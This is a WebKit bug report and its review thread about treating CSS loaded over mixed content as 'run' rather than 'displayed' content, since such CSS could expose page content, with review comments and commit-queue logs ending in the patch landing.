Bug 59056

Summary: Upgrade CSS loads from mixed content warning (displayed) to mixed content error (ran)
Product: WebKit Reporter: Chris Evans <cevans>
Component: CSSAssignee: Chris Evans <cevans>
Severity: Normal CC: abarth, commit-queue, sam
Priority: P2    
Version: 528+ (Nightly build)   
Hardware: PC   
OS: OS X 10.5   
Description Flags
abarth: review+
Patch none

Description Chris Evans 2011-04-20 18:10:50 PDT
The reason is that CSS3 selectors injected into a document via mixed-content load can in fact query, retrieve and egress the document content. That's serious (unlike mixed content images loads and frame loads).
Comment 2 Chris Evans 2011-04-20 18:22:39 PDT
Created attachment 90465 [details]
Comment 3 Adam Barth 2011-04-20 18:45:19 PDT
Comment on attachment 90465 [details]

View in context: https://bugs.webkit.org/attachment.cgi?id=90465&action=review

Let's give Sam a chance to see this patch too.

> Source/WebCore/loader/cache/CachedResourceLoader.cpp:238
> +        // XSL) or recover the content of the current document (CSS).

recover?  maybe exfiltrate ?
Comment 4 Chris Evans 2011-04-22 15:44:54 PDT
Exfiltrate it is. Landing.

Chatted to Sam out-of-band.
He raised the interesting point of naming -- do "run" and "display" cover it well any more? I can be persuaded that they still do, because I see the ever-more powerful CSS as more like running a language than displaying pixels.
But if you have any better naming ideas, I can uptake them on the next patch.
Comment 5 Chris Evans 2011-04-22 15:45:35 PDT
Created attachment 90785 [details]
Comment 6 Adam Barth 2011-04-22 17:33:28 PDT
I'm not sure whether those are the best names.  What did you have in mind?
Comment 7 Chris Evans 2011-04-22 18:00:58 PDT
I don't have any great ideas at this time. Sam?
Comment 8 WebKit Commit Bot 2011-04-22 21:04:29 PDT
Comment on attachment 90785 [details]

Rejecting attachment 90785 [details] from commit-queue.

Failed to run "['./Tools/Scripts/webkit-patch', '--status-host=queues.webkit.org', '--bot-id=cr-jail-3', 'land-a..." exit_code: 1

Last 500 characters of output:
Processing 1 patch from 1 bug.
Cleaning working directory
Updating working directory
Processing patch 90785 from bug 59056.
NOBODY (OOPS!) found in /mnt/git/webkit-commit-queue/LayoutTests/ChangeLog does not appear to be a valid reviewer according to committers.py.
ERROR: /mnt/git/webkit-commit-queue/LayoutTests/ChangeLog neither lists a valid reviewer nor contains the string "Unreviewed" or "Rubber stamp" (case insensitive).
Updating OpenSource
Current branch master is up to date.

Full output: http://queues.webkit.org/results/8494732
Comment 9 Adam Barth 2011-04-22 21:19:17 PDT
Comment on attachment 90785 [details]

If you post a patch with commit-queue+, you need to fill in the reviewer yourself because the tools don't know who reviewed the patch.  The command "webkit-patch land-safely" with do that automatically for you.
Comment 10 WebKit Commit Bot 2011-04-22 22:54:39 PDT
The commit-queue encountered the following flaky tests while processing attachment 90785 [details]:

http/tests/appcache/reload.html bug 59275
The commit-queue is continuing to process your patch.
Comment 11 WebKit Commit Bot 2011-04-22 22:55:46 PDT
Comment on attachment 90785 [details]

Clearing flags on attachment: 90785

Committed r84739: <http://trac.webkit.org/changeset/84739>
Comment 12 WebKit Commit Bot 2011-04-22 22:55:51 PDT
All reviewed patches have been landed.  Closing bug.